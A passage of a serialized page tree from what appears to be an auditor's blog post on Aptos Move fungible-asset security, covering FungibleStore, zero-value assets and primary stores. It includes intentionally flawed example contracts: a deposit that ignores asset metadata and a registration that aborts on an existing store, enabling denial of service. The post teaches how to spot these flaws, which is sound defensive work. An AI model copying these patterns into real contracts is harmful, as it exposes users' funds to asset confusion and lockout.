primary_fungible_store::deposit(global_vault_address(), fa);\n    \n    event::emit(Deposit {sender_address, fa_amount})\n}\n",[61284],{"type":28,"tag":98,"props":61285,"children":61286},{"__ignoreMap":7},[61287,61324,61362,61386,61398,61406,61451,61485,61515,61522,61559,61566,61604,61611,61657],{"type":28,"tag":116,"props":61288,"children":61289},{"class":245,"line":246},[61290,61295,61299,61304,61308,61312,61316,61320],{"type":28,"tag":116,"props":61291,"children":61292},{"style":272},[61293],{"type":33,"value":61294},"public",{"type":28,"tag":116,"props":61296,"children":61297},{"style":272},[61298],{"type":33,"value":5878},{"type":28,"tag":116,"props":61300,"children":61301},{"style":272},[61302],{"type":33,"value":61303}," deposit",{"type":28,"tag":116,"props":61305,"children":61306},{"style":266},[61307],{"type":33,"value":514},{"type":28,"tag":116,"props":61309,"children":61310},{"style":339},[61311],{"type":33,"value":5659},{"type":28,"tag":116,"props":61313,"children":61314},{"style":370},[61315],{"type":33,"value":4160},{"type":28,"tag":116,"props":61317,"children":61318},{"style":272},[61319],{"type":33,"value":5603},{"type":28,"tag":116,"props":61321,"children":61322},{"style":266},[61323],{"type":33,"value":6260},{"type":28,"tag":116,"props":61325,"children":61326},{"class":245,"line":256},[61327,61332,61336,61340,61344,61348,61353,61357],{"type":28,"tag":116,"props":61328,"children":61329},{"style":272},[61330],{"type":33,"value":61331},"    sender",{"type":28,"tag":116,"props":61333,"children":61334},{"style":370},[61335],{"type":33,"value":4160},{"type":28,"tag":116,"props":61337,"children":61338},{"style":370},[61339],{"type":33,"value":6813},{"type":28,"tag":116,"props":61341,"children":61342},{"style":272},[61343],{"type":33,"value":6818},{"type":28,"tag":116,"props":61345,"children":61346},{"style":266},[61347],{"type":33,"value":825},{"type":28,"tag":116,"props":61349,"children":61350},{"style":272},[61351],{"type":33,"value":61352},"fa",{"type":28,"tag":116,"props":61354,"children":61355},{"style":370},[61356],{"type":33,"value":4160},{"type":28,"tag":116,"props":61358,"children":61359},{"style":339},[61360],{"type":33,"value":61361}," FungibleAsset\n",{"type":28,"tag":116,"props":61363,"children":61364},{"class":245,"line":293},[61365,61369,61373,61377,61381],{"type":28,"tag":116,"props":61366,"children":61367},{"style":266},[61368],{"type":33,"value":1609},{"type":28,"tag":116,"props":61370,"children":61371},{"style":272},[61372],{"type":33,"value":6015},{"type":28,"tag":116,"props":61374,"children":61375},{"style":266},[61376],{"type":33,"value":22695},{"type":28,"tag":116,"props":61378,"children":61379},{"style":370},[61380],{"type":33,"value":9259},{"type":28,"tag":116,"props":61382,"children":61383},{"style":266},[61384],{"type":33,"value":61385},"] {\n",{"type":28,"tag":116,"props":61387,"children":61388},{"class":245,"line":361},[61389,61394],{"type":28,"tag":116,"props":61390,"children":61391},{"style":282},[61392],{"type":33,"value":61393},"    assert_not_paused",{"type":28,"tag":116,"props":61395,"children":61396},{"style":266},[61397],{"type":33,"value":1445},{"type":28,"tag":116,"props":61399,"children":61400},{"class":245,"line":387},[61401],{"type":28,"tag":116,"props":61402,"children":61403},{"style":266},[61404],{"type":33,"value":61405},"    \n",{"type":28,"tag":116,"props":61407,"children":61408},{"class":245,"line":400},[61409,61413,61418,61422,61427,61431,61435,61439,61443,61447],{"type":28,"tag":116,"props":61410,"children":61411},{"style":376},[61412],{"type":33,"value":2672},{"type":28,"tag":116,"props":61414,"children":61415},{"style":272},[61416],{"type":33,"value":61417}," fa_amount",{"type":28,"tag":116,"props":61419,"children":61420},{"style":370},[61421],{"type":33,"value":2226},{"type":28,"tag":116,"props":61423,"children":61424},{"style":266},[61425],{"type":33,"value":61426}," fungible_asset",{"type":28,"tag":116,"props":61428,"children":61429},{"style":370},[61430],{"type":33,"value":3151},{"type":28,"tag":116,"props":61432,"children":61433},{"style":282},[61434],{"type":33,"value":19970},{"type":28,"tag":116,"props":61436,"children":61437},{"style":266},[61438],{"type":33,"value":313},{"type":28,"tag":116,"props":61440,"children":61441},{"style":370},[61442],{"type":33,"value":2780},{"type":28,"tag":116,"props":61444,"children":61445},{"style":272},[61446],{"type":33,"value":61352},{"type":28,"tag":116,"props":61448,"children":61449},{"style":266},[61450],{"type":33,"value":895},{"type":28,"tag":116,"props":61452,"children":61453},{"class":245,"line":614},[61454,61458,61463,61467,61472,61476,61481],{"type":28,"tag":116,"props":61455,"children":61456},{"style":376},[61457],{"type":33,"value":2672},{"type":28,"tag":116,"props":61459,"children":61460},{"style":272},[61461],{"type":33,"value":61462}," sender_address",{"type":28,"tag":116,"props":61464,"children":61465},{"style":370},[61466],{"type":33,"value":2226},{"type":28,"tag":116,"props":61468,"children":61469},{"style":282},[61470],{"type":33,"value":61471}," address_of",{"type":28,"tag":116,"props":61473,"children":61474},{"style":266},[61475],{"type":33,"value":313},{"type":28,"tag":116,"props":61477,"children":61478},{"style":272},[61479],{"type":33,"value":61480},"sender",{"type":28,"tag":116,"props":61482,"children":61483},{"style":266},[61484],{"type":33,"value":895},{"type":28,"tag":116,"props":61486,"children":61487},{"class":245,"line":631},[61488,61493,61497,61502,61506,61511],{"type":28,"tag":116,"props":61489,"children":61490},{"style":282},[61491],{"type":33,"value":61492},"    check_compliance",{"type":28,"tag":116,"props":61494,"children":61495},{"style":266},[61496],{"type":33,"value":313},{"type":28,"tag":116,"props":61498,"children":61499},{"style":272},[61500],{"type":33,"value":61501},"fa_amount",{"type":28,"tag":116,"props":61503,"children":61504},{"style":266},[61505],{"type":33,"value":825},{"type":28,"tag":116,"props":61507,"children":61508},{"style":272},[61509],{"type":33,"value":61510},"sender_address",{"type":28,"tag":116,"props":61512,"children":61513},{"style":266},[61514],{"type":33,"value":895},{"type":28,"tag":116,"props":61516,"children":61517},{"class":245,"line":665},[61518],{"type":28,"tag":116,"props":61519,"children":61520},{"style":266},[61521],{"type":33,"value":61405},{"type":28,"tag":116,"props":61523,"children":61524},{"class":245,"line":713},[61525,61530,61534,61539,61543,61547,61551,61555],{"type":28,"tag":116,"props":61526,"children":61527},{"style":282},[61528],{"type":33,"value":61529},"    increase_deposit",{"type":28,"tag":116,"props":61531,"children":61532},{"style":266},[61533],{"type":33,"value":313},{"type":28,"tag":116,"props":61535,"children":61536},{"style":282},[61537],{"type":33,"value":61538},"get_vault",{"type":28,"tag":116,"props":61540,"children":61541},{"style":266},[61542],{"type":33,"value":313},{"type":28,"tag":116,"props":61544,"children":61545},{"style":272},[61546],{"type":33,"value":61510},{"type":28,"tag":116,"props":61548,"children":61549},{"style":266},[61550],{"type":33,"value":14840},{"type":28,"tag":116,"props":61552,"children":61553},{"style":272},[61554],{"type":33,"value":61501},{"type":28,"tag":116,"props":61556,"children":61557},{"style":266},[61558],{"type":33,"value":895},{"type":28,"tag":116,"props":61560,"children":61561},{"class":245,"line":750},[61562],{"type":28,"tag":116,"props":61563,"children":61564},{"style":266},[61565],{"type":33,"value":61405},{"type":28,"tag":116,"props":61567,"children":61568},{"class":245,"line":779},[61569,61574,61578,61583,61587,61592,61596,61600],{"type":28,"tag":116,"props":61570,"children":61571},{"style":266},[61572],{"type":33,"value":61573},"    primary_fungible_store",{"type":28,"tag":116,"props":61575,"children":61576},{"style":370},[61577],{"type":33,"value":3151},{"type":28,"tag":116,"props":61579,"children":61580},{"style":282},[61581],{"type":33,"value":61582},"deposit",{"type":28,"tag":116,"props":61584,"children":61585},{"style":266},[61586],{"type":33,"value":313},{"type":28,"tag":116,"props":61588,"children":61589},{"style":282},[61590],{"type":33,"value":61591},"global_vault_address",{"type":28,"tag":116,"props":61593,"children":61594},{"style":266},[61595],{"type":33,"value":18038},{"type":28,"tag":116,"props":61597,"children":61598},{"style":272},[61599],{"type":33,"value":61352},{"type":28,"tag":116,"props":61601,"children":61602},{"style":266},[61603],{"type":33,"value":895},{"type":28,"tag":116,"props":61605,"children":61606},{"class":245,"line":796},[61607],{"type":28,"tag":116,"props":61608,"children":61609},{"style":266},[61610],{"type":33,"value":61405},{"type":28,"tag":116,"props":61612,"children":61613},{"class":245,"line":847},[61614,61619,61623,61628,61632,61637,61641,61645,61649,61653],{"type":28,"tag":116,"props":61615,"children":61616},{"style":266},[61617],{"type":33,"value":61618},"    event",{"type":28,"tag":116,"props":61620,"children":61621},{"style":370},[61622],{"type":33,"value":3151},{"type":28,"tag":116,"props":61624,"children":61625},{"style":282},[61626],{"type":33,"value":61627},"emit",{"type":28,"tag":116,"props":61629,"children":61630},{"style":266},[61631],{"type":33,"value":313},{"type":28,"tag":116,"props":61633,"children":61634},{"style":339},[61635],{"type":33,"value":61636},"Deposit",{"type":28,"tag":116,"props":61638,"children":61639},{"style":266},[61640],{"type":33,"value":44842},{"type":28,"tag":116,"props":61642,"children":61643},{"style":272},[61644],{"type":33,"value":61510},{"type":28,"tag":116,"props":61646,"children":61647},{"style":266},[61648],{"type":33,"value":825},{"type":28,"tag":116,"props":61650,"children":61651},{"style":272},[61652],{"type":33,"value":61501},{"type":28,"tag":116,"props":61654,"children":61655},{"style":266},[61656],{"type":33,"value":32656},{"type":28,"tag":116,"props":61658,"children":61659},{"class":245,"line":898},[61660],{"type":28,"tag":116,"props":61661,"children":61662},{"style":266},[61663],{"type":33,"value":406},{"type":28,"tag":29,"props":61665,"children":61666},{},[61667],{"type":33,"value":61668},"Do you see any problems here? The application does not validate or differentiate fungible assets using their metadata, which causes all fungible asset deposits to be treated as identical.",{"type":28,"tag":29,"props":61670,"children":61671},{},[61672],{"type":33,"value":61673},"While these bugs aren't partiularly complex, they do represent an additional vulnerability class that must be checked for.",{"type":28,"tag":63,"props":61675,"children":61677},{"id":61676},"fungible-stores",[61678],{"type":33,"value":61679},"Fungible stores",{"type":28,"tag":29,"props":61681,"children":61682},{},[61683],{"type":33,"value":61684},"As mentioned, fungible assets are hot potatoes, meaning they must be destroyed after each transaction. If they lack abilities, how can they be used?",{"type":28,"tag":29,"props":61686,"children":61687},{},[61688,61690,61696],{"type":33,"value":61689},"Meet the ",{"type":28,"tag":98,"props":61691,"children":61693},{"className":61692},[],[61694],{"type":33,"value":61695},"FungibleStore",{"type":33,"value":141},{"type":28,"tag":234,"props":61698,"children":61700},{"className":2652,"code":61699,"language":2651,"meta":7,"style":7},"struct FungibleStore has key {\n    metadata: Object\u003CMetadata>,\n    balance: u64,\n    frozen: bool,\n}\n",[61701],{"type":28,"tag":98,"props":61702,"children":61703},{"__ignoreMap":7},[61704,61728,61755,61775,61794],{"type":28,"tag":116,"props":61705,"children":61706},{"class":245,"line":246},[61707,61711,61716,61720,61724],{"type":28,"tag":116,"props":61708,"children":61709},{"style":376},[61710],{"type":33,"value":9069},{"type":28,"tag":116,"props":61712,"children":61713},{"style":339},[61714],{"type":33,"value":61715}," FungibleStore",{"type":28,"tag":116,"props":61717,"children":61718},{"style":272},[61719],{"type":33,"value":9078},{"type":28,"tag":116,"props":61721,"children":61722},{"style":272},[61723],{"type":33,"value":5603},{"type":28,"tag":116,"props":61725,"children":61726},{"style":266},[61727],{"type":33,"value":1291},{"type":28,"tag":116,"props":61729,"children":61730},{"class":245,"line":256},[61731,61735,61739,61743,61747,61751],{"type":28,"tag":116,"props":61732,"children":61733},{"style":272},[61734],{"type":33,"value":61171},{"type":28,"tag":116,"props":61736,"children":61737},{"style":370},[61738],{"type":33,"value":4160},{"type":28,"tag":116,"props":61740,"children":61741},{"style":339},[61742],{"type":33,"value":61180},{"type":28,"tag":116,"props":61744,"children":61745},{"style":266},[61746],{"type":33,"value":514},{"type":28,"tag":116,"props":61748,"children":61749},{"style":339},[61750],{"type":33,"value":61189},{"type":28,"tag":116,"props":61752,"children":61753},{"style":266},[61754],{"type":33,"value":5809},{"type":28,"tag":116,"props":61756,"children":61757},{"class":245,"line":293},[61758,61763,61767,61771],{"type":28,"tag":116,"props":61759,"children":61760},{"style":272},[61761],{"type":33,"value":61762},"    balance",{"type":28,"tag":116,"props":61764,"children":61765},{"style":370},[61766],{"type":33,"value":4160},{"type":28,"tag":116,"props":61768,"children":61769},{"style":339},[61770],{"type":33,"value":5531},{"type":28,"tag":116,"props":61772,"children":61773},{"style":266},[61774],{"type":33,"value":3178},{"type":28,"tag":116,"props":61776,"children":61777},{"class":245,"line":361},[61778,61782,61786,61790],{"type":28,"tag":116,"props":61779,"children":61780},{"style":272},[61781],{"type":33,"value":60832},{"type":28,"tag":116,"props":61783,"children":61784},{"style":370},[61785],{"type":33,"value":4160},{"type":28,"tag":116,"props":61787,"children":61788},{"style":339},[61789],{"type":33,"value":11718},{"type":28,"tag":116,"props":61791,"children":61792},{"style":266},[61793],{"type":33,"value":3178},{"type":28,"tag":116,"props":61795,"children":61796},{"class":245,"line":387},[61797],{"type":28,"tag":116,"props":61798,"children":61799},{"style":266},[61800],{"type":33,"value":406},{"type":28,"tag":29,"props":61802,"children":61803},{},[61804,61809,61811,61816,61818,61823,61825,61830,61832,61837],{"type":28,"tag":98,"props":61805,"children":61807},{"className":61806},[],[61808],{"type":33,"value":61695},{"type":33,"value":61810}," manages balances and metadata instead of holding the actual ",{"type":28,"tag":98,"props":61812,"children":61814},{"className":61813},[],[61815],{"type":33,"value":61130},{"type":33,"value":61817}," (it can't because ",{"type":28,"tag":98,"props":61819,"children":61821},{"className":61820},[],[61822],{"type":33,"value":61130},{"type":33,"value":61824}," doesn't have ",{"type":28,"tag":98,"props":61826,"children":61828},{"className":61827},[],[61829],{"type":33,"value":5612},{"type":33,"value":61831},"). Withdrawals create temporary ",{"type":28,"tag":98,"props":61833,"children":61835},{"className":61834},[],[61836],{"type":33,"value":61130},{"type":33,"value":61838}," resources, while deposits destroy them and update the balance. This design prevents freezing bypasses and improves observability.",{"type":28,"tag":18457,"props":61840,"children":61841},{},[],{"type":28,"tag":29,"props":61843,"children":61844},{},[61845,61847,61852,61854,61859],{"type":33,"value":61846},"A curious reader might wonder, is there any other way to create or destroy a ",{"type":28,"tag":98,"props":61848,"children":61850},{"className":61849},[],[61851],{"type":33,"value":61130},{"type":33,"value":61853}," besides withdrawing, depositing or minting it? There is — anyone can create and destroy a zero-value ",{"type":28,"tag":98,"props":61855,"children":61857},{"className":61856},[],[61858],{"type":33,"value":61130},{"type":33,"value":141},{"type":28,"tag":234,"props":61861,"children":61863},{"className":2652,"code":61862,"language":2651,"meta":7,"style":7},"public fun destroy_zero(fungible_asset: FungibleAsset) {\n    let FungibleAsset { amount, metadata: _ } = fungible_asset;\n    assert!(amount == 0, error::invalid_argument(EAMOUNT_IS_NOT_ZERO));\n}\n\npublic fun zero\u003CT: key>(metadata: Object\u003CT>): FungibleAsset {\n    FungibleAsset {\n        metadata: object::convert(metadata),\n        amount: 0,\n    }\n}\n",[61864],{"type":28,"tag":98,"props":61865,"children":61866},{"__ignoreMap":7},[61867,61904,61956,61999,62006,62013,62085,62097,62135,62154,62161],{"type":28,"tag":116,"props":61868,"children":61869},{"class":245,"line":246},[61870,61874,61878,61883,61887,61892,61896,61900],{"type":28,"tag":116,"props":61871,"children":61872},{"style":272},[61873],{"type":33,"value":61294},{"type":28,"tag":116,"props":61875,"children":61876},{"style":272},[61877],{"type":33,"value":5878},{"type":28,"tag":116,"props":61879,"children":61880},{"style":282},[61881],{"type":33,"value":61882}," destroy_zero",{"type":28,"tag":116,"props":61884,"children":61885},{"style":266},[61886],{"type":33,"value":313},{"type":28,"tag":116,"props":61888,"children":61889},{"style":272},[61890],{"type":33,"value":61891},"fungible_asset",{"type":28,"tag":116,"props":61893,"children":61894},{"style":370},[61895],{"type":33,"value":4160},{"type":28,"tag":116,"props":61897,"children":61898},{"style":339},[61899],{"type":33,"value":61159},{"type":28,"tag":116,"props":61901,"children":61902},{"style":266},[61903],{"type":33,"value":844},{"type":28,"tag":116,"props":61905,"children":61906},{"class":245,"line":256},[61907,61911,61915,61919,61923,61927,61932,61936,61940,61944,61948,61952],{"type":28,"tag":116,"props":61908,"children":61909},{"style":376},[61910],{"type":33,"value":2672},{"type":28,"tag":116,"props":61912,"children":61913},{"style":339},[61914],{"type":33,"value":61159},{"type":28,"tag":116,"props":61916,"children":61917},{"style":266},[61918],{"type":33,"value":9254},{"type":28,"tag":116,"props":61920,"children":61921},{"style":272},[61922],{"type":33,"value":19970},{"type":28,"tag":116,"props":61924,"children":61925},{"style":266},[61926],{"type":33,"value":825},{"type":28,"tag":116,"props":61928,"children":61929},{"style":272},[61930],{"type":33,"value":61931},"metadata",{"type":28,"tag":116,"props":61933,"children":61934},{"style":370},[61935],{"type":33,"value":4160},{"type":28,"tag":116,"props":61937,"children":61938},{"style":272},[61939],{"type":33,"value":2708},{"type":28,"tag":116,"props":61941,"children":61942},{"style":266},[61943],{"type":33,"value":35828},{"type":28,"tag":116,"props":61945,"children":61946},{"style":370},[61947],{"type":33,"value":373},{"type":28,"tag":116,"props":61949,"children":61950},{"style":272},[61951],{"type":33,"value":61426},{"type":28,"tag":116,"props":61953,"children":61954},{"style":266},[61955],{"type":33,"value":384},{"type":28,"tag":116,"props":61957,"children":61958},{"class":245,"line":293},[61959,61964,61968,61972,61976,61980,61985,61989,61994],{"type":28,"tag":116,"props":61960,"children":61961},{"style":282},[61962],{"type":33,"value":61963},"    assert!",{"type":28,"tag":116,"props":61965,"children":61966},{"style":266},[61967],{"type":33,"value":313},{"type":28,"tag":116,"props":61969,"children":61970},{"style":272},[61971],{"type":33,"value":19970},{"type":28,"tag":116,"props":61973,"children":61974},{"style":370},[61975],{"type":33,"value":2953},{"type":28,"tag":116,"props":61977,"children":61978},{"style":350},[61979],{"type":33,"value":2718},{"type":28,"tag":116,"props":61981,"children":61982},{"style":266},[61983],{"type":33,"value":61984},", error",{"type":28,"tag":116,"props":61986,"children":61987},{"style":370},[61988],{"type":33,"value":3151},{"type":28,"tag":116,"props":61990,"children":61991},{"style":282},[61992],{"type":33,"value":61993},"invalid_argument",{"type":28,"tag":116,"props":61995,"children":61996},{"style":266},[61997],{"type":33,"value":61998},"(EAMOUNT_IS_NOT_ZERO));\n",{"type":28,"tag":116,"props":62000,"children":62001},{"class":245,"line":361},[62002],{"type":28,"tag":116,"props":62003,"children":62004},{"style":266},[62005],{"type":33,"value":406},{"type":28,"tag":116,"props":62007,"children":62008},{"class":245,"line":387},[62009],{"type":28,"tag":116,"props":62010,"children":62011},{"emptyLinePlaceholder":19},[62012],{"type":33,"value":1044},{"type":28,"tag":116,"props":62014,"children":62015},{"class":245,"line":400},[62016,62020,62024,62029,62033,62037,62041,62045,62049,62053,62057,62061,62065,62069,62073,62077,62081],{"type":28,"tag":116,"props":62017,"children":62018},{"style":272},[62019],{"type":33,"value":61294},{"type":28,"tag":116,"props":62021,"children":62022},{"style":272},[62023],{"type":33,"value":5878},{"type":28,"tag":116,"props":62025,"children":62026},{"style":272},[62027],{"type":33,"value":62028}," zero",{"type":28,"tag":116,"props":62030,"children":62031},{"style":266},[62032],{"type":33,"value":514},{"type":28,"tag":116,"props":62034,"children":62035},{"style":339},[62036],{"type":33,"value":5659},{"type":28,"tag":116,"props":62038,"children":62039},{"style":370},[62040],{"type":33,"value":4160},{"type":28,"tag":116,"props":62042,"children":62043},{"style":272},[62044],{"type":33,"value":5603},{"type":28,"tag":116,"props":62046,"children":62047},{"style":266},[62048],{"type":33,"value":7282},{"type":28,"tag":116,"props":62050,"children":62051},{"style":272},[62052],{"type":33,"value":61931},{"type":28,"tag":116,"props":62054,"children":62055},{"style":370},[62056],{"type":33,"value":4160},{"type":28,"tag":116,"props":62058,"children":62059},{"style":339},[62060],{"type":33,"value":61180},{"type":28,"tag":116,"props":62062,"children":62063},{"style":266},[62064],{"type":33,"value":514},{"type":28,"tag":116,"props":62066,"children":62067},{"style":339},[62068],{"type":33,"value":5659},{"type":28,"tag":116,"props":62070,"children":62071},{"style":266},[62072],{"type":33,"value":8061},{"type":28,"tag":116,"props":62074,"children":62075},{"style":370},[62076],{"type":33,"value":4160},{"type":28,"tag":116,"props":62078,"children":62079},{"style":339},[62080],{"type":33,"value":61159},{"type":28,"tag":116,"props":62082,"children":62083},{"style":266},[62084],{"type":33,"value":1291},{"type":28,"tag":116,"props":62086,"children":62087},{"class":245,"line":614},[62088,62093],{"type":28,"tag":116,"props":62089,"children":62090},{"style":339},[62091],{"type":33,"value":62092},"    FungibleAsset",{"type":28,"tag":116,"props":62094,"children":62095},{"style":266},[62096],{"type":33,"value":1291},{"type":28,"tag":116,"props":62098,"children":62099},{"class":245,"line":631},[62100,62105,62109,62114,62118,62123,62127,62131],{"type":28,"tag":116,"props":62101,"children":62102},{"style":272},[62103],{"type":33,"value":62104},"        metadata",{"type":28,"tag":116,"props":62106,"children":62107},{"style":370},[62108],{"type":33,"value":4160},{"type":28,"tag":116,"props":62110,"children":62111},{"style":266},[62112],{"type":33,"value":62113}," object",{"type":28,"tag":116,"props":62115,"children":62116},{"style":370},[62117],{"type":33,"value":3151},{"type":28,"tag":116,"props":62119,"children":62120},{"style":282},[62121],{"type":33,"value":62122},"convert",{"type":28,"tag":116,"props":62124,"children":62125},{"style":266},[62126],{"type":33,"value":313},{"type":28,"tag":116,"props":62128,"children":62129},{"style":272},[62130],{"type":33,"value":61931},{"type":28,"tag":116,"props":62132,"children":62133},{"style":266},[62134],{"type":33,"value":6408},{"type":28,"tag":116,"props":62136,"children":62137},{"class":245,"line":665},[62138,62142,62146,62150],{"type":28,"tag":116,"props":62139,"children":62140},{"style":272},[62141],{"type":33,"value":7120},{"type":28,"tag":116,"props":62143,"children":62144},{"style":370},[62145],{"type":33,"value":4160},{"type":28,"tag":116,"props":62147,"children":62148},{"style":350},[62149],{"type":33,"value":2718},{"type":28,"tag":116,"props":62151,"children":62152},{"style":266},[62153],{"type":33,"value":3178},{"type":28,"tag":116,"props":62155,"children":62156},{"class":245,"line":713},[62157],{"type":28,"tag":116,"props":62158,"children":62159},{"style":266},[62160],{"type":33,"value":3025},{"type":28,"tag":116,"props":62162,"children":62163},{"class":245,"line":750},[62164],{"type":28,"tag":116,"props":62165,"children":62166},{"style":266},[62167],{"type":33,"value":406},{"type":28,"tag":29,"props":62169,"children":62170},{},[62171],{"type":33,"value":62172},"In theory, this shouldn’t pose a problem. After all, having zero of something doesn’t exactly qualify as ownership.",{"type":28,"tag":29,"props":62174,"children":62175},{},[62176,62178,62183],{"type":33,"value":62177},"In practice, the ability to freely mint and burn zero ",{"type":28,"tag":98,"props":62179,"children":62181},{"className":62180},[],[62182],{"type":33,"value":61272},{"type":33,"value":62184}," of any type could present a significant risk. During our reviews, we enountered many protocols that did not account for this possibility, leading to arithmetic errors, DoS logic bugs or inaccurate calculations. Keep in mind that edge case, we'll come back to this.",{"type":28,"tag":75,"props":62186,"children":62188},{"id":62187},"primary-and-secondary-stores",[62189],{"type":33,"value":62190},"Primary and secondary stores",{"type":28,"tag":29,"props":62192,"children":62193},{},[62194,62200,62202,62208,62210,62215],{"type":28,"tag":98,"props":62195,"children":62197},{"className":62196},[],[62198],{"type":33,"value":62199},"FungibleStores",{"type":33,"value":62201}," in comparison to ",{"type":28,"tag":98,"props":62203,"children":62205},{"className":62204},[],[62206],{"type":33,"value":62207},"CoinStores",{"type":33,"value":62209}," are not unique. Each user can have multiple ",{"type":28,"tag":98,"props":62211,"children":62213},{"className":62212},[],[62214],{"type":33,"value":61695},{"type":33,"value":62216}," objects for a given token!",{"type":28,"tag":29,"props":62218,"children":62219},{},[62220,62222,62229,62231,62236],{"type":33,"value":62221},"A primary fungible store is maintained via the aptly named ",{"type":28,"tag":87,"props":62223,"children":62226},{"href":62224,"rel":62225},"https://github.com/aptos-labs/aptos-core/blob/2bea962eac4743db6cc0ae2e8a2fd7fcc323b121/aptos-move/framework/aptos-framework/sources/primary_fungible_store.move",[91],[62227],{"type":33,"value":62228},"primary_fungible_store",{"type":33,"value":62230}," module. It's \"primary\" because of its deterministic location, which is calculated using the owner and the fungible asset's ",{"type":28,"tag":98,"props":62232,"children":62234},{"className":62233},[],[62235],{"type":33,"value":61189},{"type":33,"value":62237}," addresses. Users can also create a number of \"secondary\" fungible stores by themselves.",{"type":28,"tag":29,"props":62239,"children":62240},{},[62241],{"type":33,"value":62242},"One key feature of the primary fungible stores is their permissionless creation. This can lead to surprising denial of service bugs!",{"type":28,"tag":234,"props":62244,"children":62246},{"className":2652,"code":62245,"language":2651,"meta":7,"style":7},"public entry fun register(\n    user: &signer, [...]\n) acquires [...] {\n    [...]\n    let wallet_store = create_primary_store(signer::address_of(sender), get_metadata());\n    [...]\n}\n",[62247],{"type":28,"tag":98,"props":62248,"children":62249},{"__ignoreMap":7},[62250,62275,62307,62330,62346,62400,62415],{"type":28,"tag":116,"props":62251,"children":62252},{"class":245,"line":246},[62253,62257,62262,62266,62271],{"type":28,"tag":116,"props":62254,"children":62255},{"style":272},[62256],{"type":33,"value":61294},{"type":28,"tag":116,"props":62258,"children":62259},{"style":272},[62260],{"type":33,"value":62261}," entry",{"type":28,"tag":116,"props":62263,"children":62264},{"style":272},[62265],{"type":33,"value":5878},{"type":28,"tag":116,"props":62267,"children":62268},{"style":282},[62269],{"type":33,"value":62270}," register",{"type":28,"tag":116,"props":62272,"children":62273},{"style":266},[62274],{"type":33,"value":3133},{"type":28,"tag":116,"props":62276,"children":62277},{"class":245,"line":256},[62278,62283,62287,62291,62295,62299,62303],{"type":28,"tag":116,"props":62279,"children":62280},{"style":272},[62281],{"type":33,"value":62282},"    user",{"type":28,"tag":116,"props":62284,"children":62285},{"style":370},[62286],{"type":33,"value":4160},{"type":28,"tag":116,"props":62288,"children":62289},{"style":370},[62290],{"type":33,"value":6813},{"type":28,"tag":116,"props":62292,"children":62293},{"style":272},[62294],{"type":33,"value":6818},{"type":28,"tag":116,"props":62296,"children":62297},{"style":266},[62298],{"type":33,"value":43760},{"type":28,"tag":116,"props":62300,"children":62301},{"style":370},[62302],{"type":33,"value":9259},{"type":28,"tag":116,"props":62304,"children":62305},{"style":266},[62306],{"type":33,"value":11440},{"type":28,"tag":116,"props":62308,"children":62309},{"class":245,"line":293},[62310,62314,62318,62322,62326],{"type":28,"tag":116,"props":62311,"children":62312},{"style":266},[62313],{"type":33,"value":1609},{"type":28,"tag":116,"props":62315,"children":62316},{"style":272},[62317],{"type":33,"value":6015},{"type":28,"tag":116,"props":62319,"children":62320},{"style":266},[62321],{"type":33,"value":22695},{"type":28,"tag":116,"props":62323,"children":62324},{"style":370},[62325],{"type":33,"value":9259},{"type":28,"tag":116,"props":62327,"children":62328},{"style":266},[62329],{"type":33,"value":61385},{"type":28,"tag":116,"props":62331,"children":62332},{"class":245,"line":361},[62333,62338,62342],{"type":28,"tag":116,"props":62334,"children":62335},{"style":266},[62336],{"type":33,"value":62337},"    [",{"type":28,"tag":116,"props":62339,"children":62340},{"style":370},[62341],{"type":33,"value":9259},{"type":28,"tag":116,"props":62343,"children":62344},{"style":266},[62345],{"type":33,"value":11440},{"type":28,"tag":116,"props":62347,"children":62348},{"class":245,"line":387},[62349,62353,62358,62362,62367,62371,62375,62379,62383,62387,62391,62396],{"type":28,"tag":116,"props":62350,"children":62351},{"style":376},[62352],{"type":33,"value":2672},{"type":28,"tag":116,"props":62354,"children":62355},{"style":272},[62356],{"type":33,"value":62357}," wallet_store",{"type":28,"tag":116,"props":62359,"children":62360},{"style":370},[62361],{"type":33,"value":2226},{"type":28,"tag":116,"props":62363,"children":62364},{"style":282},[62365],{"type":33,"value":62366}," create_primary_store",{"type":28,"tag":116,"props":62368,"children":62369},{"style":266},[62370],{"type":33,"value":6872},{"type":28,"tag":116,"props":62372,"children":62373},{"style":370},[62374],{"type":33,"value":3151},{"type":28,"tag":116,"props":62376,"children":62377},{"style":282},[62378],{"type":33,"value":6881},{"type":28,"tag":116,"props":62380,"children":62381},{"style":266},[62382],{"type":33,"value":313},{"type":28,"tag":116,"props":62384,"children":62385},{"style":272},[62386],{"type":33,"value":61480},{"type":28,"tag":116,"props":62388,"children":62389},{"style":266},[62390],{"type":33,"value":14840},{"type":28,"tag":116,"props":62392,"children":62393},{"style":282},[62394],{"type":33,"value":62395},"get_metadata",{"type":28,"tag":116,"props":62397,"children":62398},{"style":266},[62399],{"type":33,"value":1577},{"type":28,"tag":116,"props":62401,"children":62402},{"class":245,"line":400},[62403,62407,62411],{"type":28,"tag":116,"props":62404,"children":62405},{"style":266},[62406],{"type":33,"value":62337},{"type":28,"tag":116,"props":62408,"children":62409},{"style":370},[62410],{"type":33,"value":9259},{"type":28,"tag":116,"props":62412,"children":62413},{"style":266},[62414],{"type":33,"value":11440},{"type":28,"tag":116,"props":62416,"children":62417},{"class":245,"line":614},[62418],{"type":28,"tag":116,"props":62419,"children":62420},{"style":266},[62421],{"type":33,"value":406},{"type":28,"tag":29,"props":62423,"children":62424},{},[62425,62426,62432,62434,62440],{"type":33,"value":16275},{"type":28,"tag":98,"props":62427,"children":62429},{"className":62428},[],[62430],{"type":33,"value":62431},"create_primary_store",{"type":33,"value":62433}," function can introduce DoS vulnerabilities because it aborts if the store already exists. Using ",{"type":28,"tag":98,"props":62435,"children":62437},{"className":62436},[],[62438],{"type":33,"value":62439},"ensure_primary_store_exists",{"type":33,"value":62441}," is recommended to avoid such issues.",{"type":28,"tag":63,"props":62443,"children":62445},{"id":62444},"fungible-assets-and-objects",[62446],{"type":33,"value":62447},"Fungible assets and objects",{"type":28,"tag":29,"props":62449,"children":62450},{},[62451,62453,62458,62460,62467],{"type":33,"value":62452},"The fungible asset standard is not a standalone module. It has heavy dependencies on a sibling module, the ",{"type":28,"tag":98,"props":62454,"children":62456},{"className":62455},[],[62457],{"type":33,"value":48472},{"type":33,"value":62459}," module, introduced in 